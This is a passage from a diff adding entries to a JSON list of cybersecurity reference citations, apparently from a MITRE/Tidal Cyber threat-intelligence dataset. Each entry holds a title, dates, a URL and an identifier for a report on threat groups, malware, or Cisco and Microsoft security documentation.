"76bf3ce1-b94c-4b3d-9707-aca8a1ae5555", + "value": "Microsoft Change Normal Template" + }, + { + "description": "Microsoft. (n.d.). Change which programs Windows 7 uses by default. Retrieved July 26, 2016.", + "meta": { + "date_accessed": "2016-07-26T00:00:00Z", + "refs": [ + "https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs" + ], + "source": "MITRE", + "title": "Change which programs Windows 7 uses by default" + }, + "related": [], + "uuid": "de515277-a280-40e5-ba34-3e8f16a5c703", + "value": "Microsoft Change Default Programs" + }, + { + "description": "Sebastian Feldmann. (2018, February 14). Chaos: a Stolen Backdoor Rising Again. Retrieved March 5, 2018.", + "meta": { + "date_accessed": "2018-03-05T00:00:00Z", + "date_published": "2018-02-14T00:00:00Z", + "refs": [ + "http://gosecure.net/2018/02/14/chaos-stolen-backdoor-rising/" + ], + "source": "MITRE", + "title": "Chaos: a Stolen Backdoor Rising Again" + }, + "related": [], + "uuid": "8e6916c1-f102-4b54-b6a5-a58fed825c2e", + "value": "Chaos Stolen Backdoor" + }, + { + "description": "Patrick Wardle. (n.d.). Chapter 0x2: Persistence. Retrieved April 13, 2022.", + "meta": { + "date_accessed": "2022-04-13T00:00:00Z", + "refs": [ + "https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf" + ], + "source": "MITRE", + "title": "Chapter 0x2: Persistence" + }, + "related": [], + "uuid": "6272b9a2-d704-43f3-9e25-6c434bb5d1ef", + "value": "Wardle Persistence Chapter" + }, + { + "description": "Cisco. (2023, February 17). Chapter: Deploying RSA Keys Within a PKI . Retrieved March 27, 2023.", + "meta": { + "date_accessed": "2023-03-27T00:00:00Z", + "date_published": "2023-02-17T00:00:00Z", + "refs": [ + "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_conn_pki/configuration/xe-17/sec-pki-xe-17-book/sec-deploy-rsa-pki.html#GUID-1CB802D8-9DE3-447F-BECE-CF22F5E11436" + ], + "source": "MITRE", + "title": "Chapter: Deploying RSA Keys Within a PKI" + }, + "related": [], + "uuid": "132f387e-4ee3-51d3-a3b6-d61102ada152", + "value": "cisco_deploy_rsa_keys" + }, + { + "description": "Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017.", + "meta": { + "date_accessed": "2017-03-01T00:00:00Z", + "date_published": "2017-02-19T00:00:00Z", + "refs": [ + "https://en.wikipedia.org/wiki/Character_encoding" + ], + "source": "MITRE", + "title": "Character Encoding" + }, + "related": [], + "uuid": "3e7df20f-5d11-4102-851f-04e89c25d12f", + "value": "Wikipedia Character Encoding" + }, + { + "description": "ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.", + "meta": { + "date_accessed": "2017-12-27T00:00:00Z", + "date_published": "2017-12-01T00:00:00Z", + "refs": [ + "http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf" + ], + "source": "MITRE", + "title": "Charming Kitten" + }, + "related": [], + "uuid": "23ab1ad2-e9d4-416a-926f-6220a59044ab", + "value": "ClearSky Charming Kitten Dec 2017" + }, + { + "description": "Certfa Labs. (2021, January 8). Charming Kitten’s Christmas Gift. Retrieved May 3, 2021.", + "meta": { + "date_accessed": "2021-05-03T00:00:00Z", + "date_published": "2021-01-08T00:00:00Z", + "refs": [ + "https://blog.certfa.com/posts/charming-kitten-christmas-gift/" + ], + "source": "MITRE", + "title": "Charming Kitten’s Christmas Gift" + }, + "related": [], + "uuid": "c38a8af6-3f9b-40c3-8122-a2a51eb50664", + "value": "Certfa Charming Kitten January 2021" + }, + { + "description": "Larson, S. and Wise, J. (2022, February 15). Charting TA2541's Flight. Retrieved September 12, 2023.", + "meta": { + "date_accessed": "2023-09-12T00:00:00Z", + "date_published": "2022-02-15T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/blog/threat-insight/charting-ta2541s-flight" + ], + "source": "MITRE", + "title": "Charting TA2541's Flight" + }, + "related": [], + "uuid": "db0b1425-8bd7-51b5-bae3-53c5ccccb8da", + "value": "Proofpoint TA2541 February 2022" + }, + { + "description": "Nakamura, Y.. (2017, February 17). ChChes - Malware that Communicates with C&C Servers Using Cookie Headers. Retrieved March 1, 2017.", + "meta": { + "date_accessed": "2017-03-01T00:00:00Z", + "date_published": "2017-02-17T00:00:00Z", + "refs": [ + "http://blog.jpcert.or.jp/2017/02/chches-malware--93d6.html" + ], + "source": "MITRE", + "title": "ChChes - Malware that Communicates with C&C Servers Using Cookie Headers" + }, + "related": [], + "uuid": "657b43aa-ead2-41d3-911a-d714d9b28e19", + "value": "JPCERT ChChes Feb 2017" + }, + { + "description": "Howard Oakley. (2020, November 16). Checks on executable code in Catalina and Big Sur: a first draft. Retrieved September 21, 2022.", + "meta": { + "date_accessed": "2022-09-21T00:00:00Z", + "date_published": "2020-11-16T00:00:00Z", + "refs": [ + "https://eclecticlight.co/2020/11/16/checks-on-executable-code-in-catalina-and-big-sur-a-first-draft/" + ], + "source": "MITRE", + "title": "Checks on executable code in Catalina and Big Sur: a first draft" + }, + "related": [], + "uuid": "2885db46-4f8c-4c35-901c-7641c7701293", + "value": "EclecticLightChecksonEXECodeSigning" + }, + { + "description": "Anomali Threat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021.", + "meta": { + "date_accessed": "2021-04-12T00:00:00Z", + "date_published": "2019-10-07T00:00:00Z", + "refs": [ + "https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations" + ], + "source": "MITRE, Tidal Cyber", + "title": "China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations" + }, + "related": [], + "uuid": "70277fa4-60a8-475e-993a-c74241b76127", + "value": "Anomali MUSTANG PANDA October 2019" + }, + { + "description": "FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.", + "meta": { + "date_accessed": "2015-12-04T00:00:00Z", + "date_published": "2015-12-01T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html" + ], + "source": "MITRE, Tidal Cyber", + "title": "China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets" + }, + "related": [], + "uuid": "f3470275-9652-440e-914d-ad4fc5165413", + "value": "FireEye admin@338" + }, + { + "description": "Demboski, M., et al. (2021, October 26). China cyber attacks: the current threat landscape. Retrieved March 25, 2022.", + "meta": { + "date_accessed": "2022-03-25T00:00:00Z", + "date_published": "2021-10-26T00:00:00Z", + "refs": [ + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape" + ], + "source": "MITRE", + "title": "China cyber attacks: the current threat landscape" + }, + "related": [], + "uuid": "98b2d114-4246-409d-934a-238682fd5ae6", + "value": "IronNet BlackTech Oct 2021" + }, + { + "description": "Insikt Group. (2021, February 28). China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions. Retrieved March 22, 2021.", + "meta": { + "date_accessed": "2021-03-22T00:00:00Z", + "date_published": "2021-02-28T00:00:00Z", + "refs": [ + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0228.pdf" + ], + "source": "MITRE", + "title": "China-Linked Group RedEcho Targets the Indian Power Sector Amid Heightened Border Tensions" + }, + "related": [], + "uuid": "6da7eb8a-aab4-41ea-a0b7-5313d88cbe91", + "value": "Recorded Future RedEcho Feb 2021" + }, + { + "description": "Budington, B. (2015, April 2). China Uses Unencrypted Websites to Hijack Browsers in GitHub Attack. Retrieved September 1, 2023.", + "meta": { + "date_accessed": "2023-09-01T00:00:00Z", + "date_published": "2015-04-02T00:00:00Z", + "refs": [ + "https://www.eff.org/deeplinks/2015/04/china-uses-unencrypted-websites-to-hijack-browsers-in-github-attack" + ], + "source": "MITRE", + "title": "China Uses Unencrypted Websites to Hijack Browsers in GitHub Attack" + }, + "related": [], + "uuid": "b8405628-6366-5cc9-a9af-b97d5c9176dd", + "value": "EFF China GitHub Attack" + }, + { + "description": "Falcone, R. & Miller-Osborn, J. (2015, September 23). Chinese Actors Use ‘3102’ Malware in Attacks on US Government and EU Media. Retrieved March 19, 2018.", + "meta": { + "date_accessed": "2018-03-19T00:00:00Z", + "date_published": "2015-09-23T00:00:00Z", + "refs": [ + "https://researchcenter.paloaltonetworks.com/2015/09/chinese-actors-use-3102-malware-in-attacks-on-us-government-and-eu-media/" + ], + "source": "MITRE", + "title": "Chinese Actors Use ‘3102’ Malware in Attacks on US Government and EU Media" + }, + "related": [], + "uuid": "db340043-43a7-4b16-a570-92a0d879b2bf", + "value": "PaloAlto 3102 Sept 2015" + }, + { + "description": "Desai, D.. (2015, August 14). Chinese cyber espionage APT group leveraging recently leaked Hacking Team exploits to target a Financial Services Firm. Retrieved January 26, 2016.", + "meta": { + "date_accessed": "2016-01-26T00:00:00Z", + "date_published": "2015-08-14T00:00:00Z", + "refs": [ + "http://research.zscaler.com/2015/08/chinese-cyber-espionage-apt-group.html" + ], + "source": "MITRE", + "title": "Chinese cyber espionage APT group leveraging recently leaked Hacking Team exploits to target a Financial Services Firm" + }, + "related": [], + "uuid": "83e6ab22-1f01-4c9b-90e5-0279af487805", + "value": "ZScaler Hacking Team" + }, + { + "description": "Khandelwal, S. (2018, June 14). Chinese Hackers Carried Out Country-Level Watering Hole Attack. Retrieved August 18, 2018.", + "meta": { + "date_accessed": "2018-08-18T00:00:00Z", + "date_published": "2018-06-14T00:00:00Z", + "refs": [ + "https://thehackernews.com/2018/06/chinese-watering-hole-attack.html" + ], + "source": "MITRE", + "title": "Chinese Hackers Carried Out Country-Level Watering Hole Attack" + }, + "related": [], + "uuid": "de78446a-cb46-4422-820b-9ddf07557b1a", + "value": "Hacker News LuckyMouse June 2018" + }, + { + "description": "Chickowski, E. (2015, February 10). Chinese Hacking Group Codoso Team Uses Forbes.com As Watering Hole. Retrieved September 13, 2018.", + "meta": { + "date_accessed": "2018-09-13T00:00:00Z", + "date_published": "2015-02-10T00:00:00Z", + "refs": [ + "https://www.darkreading.com/attacks-breaches/chinese-hacking-group-codoso-team-uses-forbescom-as-watering-hole-/d/d-id/1319059" + ], + "source": "MITRE", + "title": "Chinese Hacking Group Codoso Team Uses Forbes.com As Watering Hole" + }, + "related": [], + "uuid": "c24035b1-2021-44ae-b01e-651e44526737", + "value": "Dark Reading Codoso Feb 2015" + }, + { + "description": "INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.", + "meta": { + "date_accessed": "2022-09-02T00:00:00Z", + "date_published": "2021-07-08T00:00:00Z", + "refs": [ + "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan" + ], + "source": "MITRE", + "title": "Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling" + }, + "related": [], + "uuid": "258433e7-f829-4365-adbb-c5690159070f", + "value": "Recorded Future TAG-22 July 2021" + }, + { + "description": "Insikt Group. (2021, December 8). Chinese State-Sponsored Cyber Espionage Activity Supports Expansion of Regional Power and Influence in Southeast Asia. Retrieved September 19, 2022.", + "meta": { + "date_accessed": "2022-09-19T00:00:00Z", + "date_published": "2021-12-08T00:00:00Z", + "refs": [ + "https://go.recordedfuture.com/hubfs/reports/cta-2021-1208.pdf" + ], + "source": "MITRE", + "title": "Chinese State-Sponsored Cyber Espionage Activity Supports Expansion of Regional Power and Influence in Southeast Asia" + }, + "related": [], + "uuid": "0809db3b-81a8-475d-920a-cb913b30f42e", + "value": "Recorded Future Chinese Activity in Southeast Asia December 2021" + }, + { + "description": "Insikt Group. (2020, July 28). CHINESE STATE-SPONSORED GROUP ‘REDDELTA’ TARGETS THE VATICAN AND CATHOLIC ORGANIZATIONS. Retrieved April 13, 2021.", + "meta": { + "date_accessed": "2021-04-13T00:00:00Z", + "date_published": "2020-07-28T00:00:00Z", + "refs": [ + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf" + ], + "source": "MITRE", + "title": "CHINESE STATE-SPONSORED GROUP ‘REDDELTA’ TARGETS THE VATICAN AND CATHOLIC ORGANIZATIONS" + }, + "related": [], + "uuid": "e2bc037e-d483-4670-8281-70e51b16effe", + "value": "Recorded Future REDDELTA July 2020" + }, + { + "description": "Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017.", + "meta": { + "date_accessed": "2017-03-20T00:00:00Z", + "date_published": "2017-03-18T00:00:00Z", + "refs": [ + "https://github.com/chipsec/chipsec" + ], + "source": "MITRE", + "title": "CHIPSEC Platform Security Assessment Framework" + }, + "related": [], + "uuid": "47501334-56cb-453b-a9e3-33990d88018b", + "value": "Github CHIPSEC" + }, + { + "description": "Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017.", + "meta": { + "date_accessed": "2017-03-13T00:00:00Z", + "date_published": "2017-03-08T00:00:00Z", + "refs": [ + "https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/" + ], + "source": "MITRE", + "title": "CHIPSEC Support Against Vault 7 Disclosure Scanning" + }, + "related": [], + "uuid": "b65ed687-c279-4f64-9dd2-839164cd269c", + "value": "McAfee CHIPSEC Blog" + }, + { + "description": "Murilo, N., Steding-Jessen, K. (2017, August 23). Chkrootkit. Retrieved April 9, 2018.", + "meta": { + "date_accessed": "2018-04-09T00:00:00Z", + "date_published": "2017-08-23T00:00:00Z", + "refs": [ + "http://www.chkrootkit.org/" + ], + "source": "MITRE", + "title": "Chkrootkit" + }, + "related": [], + "uuid": "828fb4b9-17a6-4a87-ac2a-631643adb18d", + "value": "Chkrootkit Main" + }, + { + "description": "Microsoft. (2022, August 26). Choose the right authentication method for your Azure Active Directory hybrid identity solution. Retrieved September 28, 2022.", + "meta": { + "date_accessed": "2022-09-28T00:00:00Z", + "date_published": "2022-08-26T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/hybrid/choose-ad-authn" + ], + "source": "MITRE", + "title": "Choose the right authentication method for your Azure Active Directory hybrid identity solution" + }, + "related": [], + "uuid": "b019406c-6e39-41a2-a8b4-97f8d6482147", + "value": "Azure AD Hybrid Identity" + }, + { + "description": "Cisco. (2023, March 7). Cisco IOS Security Command Reference: Commands S to Z . Retrieved July 13, 2022.", + "meta": { + "date_accessed": "2022-07-13T00:00:00Z", + "date_published": "2023-03-07T00:00:00Z", + "refs": [ + "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s5.html" + ], + "source": "MITRE", + "title": "Cisco IOS Security Command Reference: Commands S to Z" + }, + "related": [], + "uuid": "11d34884-4559-57ad-8910-54e517c6493e", + "value": "show_ssh_users_cmd_cisco" + }, + { + "description": "George Nosenko. (2015). CISCO IOS SHELLCODE: ALL-IN-ONE. Retrieved October 21, 2020.", + "meta": { + "date_accessed": "2020-10-21T00:00:00Z", + "date_published": "2015-01-01T00:00:00Z", + "refs": [ + "http://2015.zeronights.org/assets/files/05-Nosenko.pdf" + ], + "source": "MITRE", + "title": "CISCO IOS SHELLCODE: ALL-IN-ONE" + }, + "related": [], + "uuid": "55a45f9b-7be4-4f1b-8b19-a0addf9da8d8", + "value": "Cisco IOS Shellcode" + }, + { + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - AAA. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "refs": [ + "https://tools.cisco.com/security/center/resources/integrity_assurance.html#38" + ], + "source": "MITRE", + "title": "Cisco IOS Software Integrity Assurance - AAA" + }, + "related": [], + "uuid": "2d1b5021-91ad-43c9-8527-4978fa779168", + "value": "Cisco IOS Software Integrity Assurance - AAA" + }, + { + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot Information. Retrieved October 21, 2020.", + "meta": { + "date_accessed": "2020-10-21T00:00:00Z", + "refs": [ + "https://tools.cisco.com/security/center/resources/integrity_assurance.html#26" + ], + "source": "MITRE", + "title": "Cisco IOS Software Integrity Assurance - Boot Information" + }, + "related": [], + "uuid": "5349863a-00c1-42bf-beac-4e7d053d6311", + "value": "Cisco IOS Software Integrity Assurance - Boot Information" + }, + { + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Change Control. Retrieved October 21, 2020.", + "meta": { + "date_accessed": "2020-10-21T00:00:00Z", + "refs": [ + "https://tools.cisco.com/security/center/resources/integrity_assurance.html#31" + ], + "source": "MITRE", + "title": "Cisco IOS Software Integrity Assurance - Change Control" + }, + "related": [], + "uuid": "8fb532f2-c730-4b86-b8d2-2314ce559289", + "value": "Cisco IOS Software Integrity Assurance - Change Control" + }, + { + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "refs": [ + "https://tools.cisco.com/security/center/resources/integrity_assurance.html#7" + ], + "source": "MITRE", + "title": "Cisco IOS Software Integrity Assurance - Cisco IOS Image File Verification" + }, + "related": [], + "uuid": "f1d736cb-63c1-43e8-a83b-ed86b7c27606", + "value": "Cisco IOS Software Integrity Assurance - Image File Verification" + }, + { + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "refs": [ + "https://tools.cisco.com/security/center/resources/integrity_assurance.html#13" + ], + "source": "MITRE", + "title": "Cisco IOS Software Integrity Assurance - Cisco IOS Run-Time Memory Integrity Verification" + }, + "related": [], + "uuid": "284608ea-3769-470e-950b-cbd67796b20f", + "value": "Cisco IOS Software Integrity Assurance - Run-Time Memory Verification" + }, + { + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command History. Retrieved October 21, 2020.", + "meta": { + "date_accessed": "2020-10-21T00:00:00Z", + "refs": [ + "https://tools.cisco.com/security/center/resources/integrity_assurance.html#23" + ], + "source": "MITRE", + "title": "Cisco IOS Software Integrity Assurance - Command History" + }, + "related": [], + "uuid": "dbca06dd-1184-4d52-9ee8-b059e368033c", + "value": "Cisco IOS Software Integrity Assurance - Command History" + }, + { + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Credentials Management. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "refs": [ + "https://tools.cisco.com/security/center/resources/integrity_assurance.html#40" + ], + "source": "MITRE", + "title": "Cisco IOS Software Integrity Assurance - Credentials Management" + }, + "related": [], + "uuid": "9a7428e3-bd77-4c3e-ac90-c4e30d504ba6", + "value": "Cisco IOS Software Integrity Assurance - Credentials Management" + }, + { + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Deploy Signed IOS. Retrieved October 21, 2020.", + "meta": { + "date_accessed": "2020-10-21T00:00:00Z", + "refs": [ + "https://tools.cisco.com/security/center/resources/integrity_assurance.html#34" + ], + "source": "MITRE", + "title": "Cisco IOS Software Integrity Assurance - Deploy Signed IOS" + }, + "related": [], + "uuid": "71ea5591-6e46-4c58-a4e8-c629eba1b6c5", + "value": "Cisco IOS Software Integrity Assurance - Deploy Signed IOS" + }, + { + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Image File Integrity. Retrieved October 21, 2020.", + "meta": { + "date_accessed": "2020-10-21T00:00:00Z", + "refs": [ + "https://tools.cisco.com/security/center/resources/integrity_assurance.html#30" + ], + "source": "MITRE", + "title": "Cisco IOS Software Integrity Assurance - Image File Integrity" + }, + "related": [], + "uuid": "90909bd4-15e8-48ee-8067-69f04736c583", + "value": "Cisco IOS Software Integrity Assurance - Image File Integrity" + }, + { + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure Boot. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "refs": [ + "https://tools.cisco.com/security/center/resources/integrity_assurance.html#35" + ], + "source": "MITRE", + "title": "Cisco IOS Software Integrity Assurance - Secure Boot" + }, + "related": [], + "uuid": "4f6f686e-bcda-480a-88a1-ad7b00084c13", + "value": "Cisco IOS Software Integrity Assurance - Secure Boot" + }, + { + "description": "Cisco. (n.d.). Cisco IOS Software Integrity Assurance - TACACS. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "refs": [ + "https://tools.cisco.com/security/center/resources/integrity_assurance.html#39" + ], + "source": "MITRE", + "title": "Cisco IOS Software Integrity Assurance - TACACS" + }, + "related": [], + "uuid": "54506dc2-6496-4edb-a5bf-fe64bf235ac0", + "value": "Cisco IOS Software Integrity Assurance - TACACS" + }, + { + "description": "Cisco. (n.d.). Cisco IOS XR Interface and Hardware Component Configuration Guide for the Cisco CRS Router, Release 5.1.x. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "refs": [ + "https://www.cisco.com/c/en/us/td/docs/routers/crs/software/crs_r5-1/interfaces/configuration/guide/hc51xcrsbook/hc51span.html" + ], + "source": "MITRE", + "title": "Cisco IOS XR Interface and Hardware Component Configuration Guide for the Cisco CRS Router, Release 5.1.x" + }, + "related": [], + "uuid": "1a5c86ad-d3b1-408b-a6b4-14ca0e572020", + "value": "Cisco Traffic Mirroring" + }, + { + "description": "Nick Biasini. (2022, August 10). Cisco Talos shares insights related to recent cyber attack on Cisco. Retrieved March 9, 2023.", + "meta": { + "date_accessed": "2023-03-09T00:00:00Z", + "date_published": "2022-08-10T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/recent-cyber-attack/" + ], + "source": "MITRE", + "title": "Cisco Talos shares insights related to recent cyber attack on Cisco" + }, + "related": [], + "uuid": "143182ad-6a16-5a0d-a5c4-7dae721a9e26", + "value": "Talos - Cisco Attack 2022" + }, + { + "description": "Citrix. (2023, July 18). Citrix ADC and Citrix Gateway Security Bulletin for CVE-2023-3519, CVE-2023-3466, CVE-2023-3467. Retrieved July 24, 2023.", + "meta": { + "date_accessed": "2023-07-24T00:00:00Z", + "date_published": "2023-07-18T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://support.citrix.com/article/CTX561482/citrix-adc-and-citrix-gateway-security-bulletin-for-cve20233519-cve20233466-cve20233467" + ], + "source": "Tidal Cyber", + "title": "Citrix ADC and Citrix Gateway Security Bulletin for CVE-2023-3519, CVE-2023-3466, CVE-2023-3467" + }, + "related": [], + "uuid": "245ef1b7-778d-4df2-99a9-b51c95c57580", + "value": "Citrix Bulletin CVE-2023-3519" + }, + { + "description": "Pieter Arntz. (2023, November 24). Citrix Bleed widely exploited, warn government agencies. Retrieved November 30, 2023.", + "meta": { + "date_accessed": "2023-11-30T00:00:00Z", + "date_published": "2023-11-24T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://www.malwarebytes.com/blog/news/2023/11/citrix-bleed-widely-exploitated-warn-government-agencies" + ], + "source": "Tidal Cyber", + "title": "Citrix Bleed widely exploited, warn government agencies" + }, + "related": [], + "uuid": "fdc86cea-0015-48d1-934f-b22244de6306", + "value": "Malwarebytes Citrix Bleed November 24 2023" + }, + { + "description": "Chen, T. and Chen, Z. (2020, February 17). CLAMBLING - A New Backdoor Base On Dropbox. Retrieved November 12, 2021.", + "meta": { + "date_accessed": "2021-11-12T00:00:00Z", + "date_published": "2020-02-17T00:00:00Z", + "refs": [ + "https://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/" + ], + "source": "MITRE", + "title": "CLAMBLING - A New Backdoor Base On Dropbox" + }, + "related": [], + "uuid": "51144a8a-0cd4-4d5d-826b-21c2dc8422be", + "value": "Talent-Jump Clambling February 2020" + }, + { + "description": "Scott, M.. (2014, June 10). Clandestine Fox, Part Deux. Retrieved January 14, 2016.", + "meta": { + "date_accessed": "2016-01-14T00:00:00Z", + "date_published": "2014-06-10T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html" + ], + "source": "MITRE", + "title": "Clandestine Fox, Part Deux" + }, + "related": [], + "uuid": "82500741-984d-4039-8f53-b303845c2849", + "value": "FireEye Clandestine Fox Part 2" + }, + { + "description": "Microsoft. (n.d.). Clear-EventLog. Retrieved July 2, 2018.", + "meta": { + "date_accessed": "2018-07-02T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventlog" + ], + "source": "MITRE", + "title": "Clear-EventLog" + }, + "related": [], + "uuid": "35944ff0-2bbd-4055-8e8a-cfff27241a8a", + "value": "Microsoft Clear-EventLog" + }, + { + "description": "Rich Trouton. (2012, November 20). Clearing the quarantine extended attribute from downloaded applications. Retrieved July 5, 2017.", + "meta": { + "date_accessed": "2017-07-05T00:00:00Z", + "date_published": "2012-11-20T00:00:00Z", + "refs": [ + "https://derflounder.wordpress.com/2012/11/20/clearing-the-quarantine-extended-attribute-from-downloaded-applications/" + ], + "source": "MITRE", + "title": "Clearing the quarantine extended attribute from downloaded applications" + }, + "related": [], + "uuid": "4115ab53-751c-4016-9151-a55eab7d6ddf", + "value": "Clearing quarantine attribute" + }, + { + "description": "Dray Agha. (2022, August 16). Cleartext Shenanigans: Gifting User Passwords to Adversaries With NPPSPY. Retrieved March 30, 2023.", + "meta": { + "date_accessed": "2023-03-30T00:00:00Z", + "date_published": "2022-08-16T00:00:00Z", + "refs": [ + "https://www.huntress.com/blog/cleartext-shenanigans-gifting-user-passwords-to-adversaries-with-nppspy" + ], + "source": "MITRE", + "title": "Cleartext Shenanigans: Gifting User Passwords to Adversaries With NPPSPY" + }, + "related": [], + "uuid": "df1f7379-38c3-5ca9-8333-d684022c000c", + "value": "NPPSPY - Huntress" + }, + { + "description": "LOLBAS. (2018, May 25). CL_Invocation.ps1. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/" + ], + "source": "Tidal Cyber", + "title": "CL_Invocation.ps1" + }, + "related": [], + "uuid": "a53e093a-973c-491d-91e3-bc7804d87b8b", + "value": "CL_Invocation.ps1 - LOLBAS Project" + }, + { + "description": "Microsoft, JasonGerend, et al. (2023, February 3). clip. Retrieved June 21, 2022.", + "meta": { + "date_accessed": "2022-06-21T00:00:00Z", + "date_published": "2023-02-03T00:00:00Z", + "refs": [ + "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/clip" + ], + "source": "MITRE", + "title": "clip" + }, + "related": [], + "uuid": "8a961fa1-def0-5efe-8599-62e884d4ea22", + "value": "clip_win_server" + }, + { + "description": "Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s wings: Outing macOS malware before it takes flight. Retrieved April 20, 2021.", + "meta": { + "date_accessed": "2021-04-20T00:00:00Z", + "date_published": "2021-02-18T00:00:00Z", + "refs": [ + "https://redcanary.com/blog/clipping-silver-sparrows-wings/" + ], + "source": "MITRE", + "title": "Clipping Silver Sparrow’s wings: Outing macOS malware before it takes flight" + }, + "related": [], + "uuid": "f08a856d-6c3e-49e2-b7ba-399831c637e5", + "value": "Red Canary Silver Sparrow Feb2021" + }, + { + "description": "LOLBAS. (2021, September 26). CL_LoadAssembly.ps1. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2021-09-26T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/" + ], + "source": "Tidal Cyber", + "title": "CL_LoadAssembly.ps1" + }, + "related": [], + "uuid": "31a14027-1181-49b9-87bf-78a65a551312", + "value": "CL_LoadAssembly.ps1 - LOLBAS Project" + }, + { + "description": "LOLBAS. (2018, May 25). CL_Mutexverifiers.ps1. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/" + ], + "source": "Tidal Cyber", + "title": "CL_Mutexverifiers.ps1" + }, + "related": [], + "uuid": "75b89502-21ed-4920-95cc-212eaf17f281", + "value": "CL_Mutexverifiers.ps1 - LOLBAS Project" + }, + { + "description": "Cybereason Nocturnus. (2020, December 23). Cybereason vs. Clop Ransomware. Retrieved May 11, 2021.", + "meta": { + "date_accessed": "2021-05-11T00:00:00Z", + "refs": [ + "https://www.cybereason.com/blog/cybereason-vs.-clop-ransomware" + ], + "source": "MITRE", + "title": "Clop Ransomware" + }, + "related": [], + "uuid": "f54d682d-100e-41bb-96be-6a79ea422066", + "value": "Cybereason Clop Dec 2020" + }, + { + "description": "Mundo, A. (2019, August 1). Clop Ransomware. Retrieved May 10, 2021.", + "meta": { + "date_accessed": "2021-05-10T00:00:00Z", + "date_published": "2019-08-01T00:00:00Z", + "refs": [ + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clop-ransomware/" + ], + "source": "MITRE", + "title": "Clop Ransomware" + }, + "related": [], + "uuid": "458141bd-7dd2-41fd-82e8-7ea2e4a477ab", + "value": "Mcafee Clop Aug 2019" + }, + { + "description": "GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020.", + "meta": { + "date_accessed": "2020-05-08T00:00:00Z", + "date_published": "2014-12-10T00:00:00Z", + "refs": [ + "https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/" + ], + "source": "MITRE", + "title": "Cloud Atlas: RedOctober APT is back in 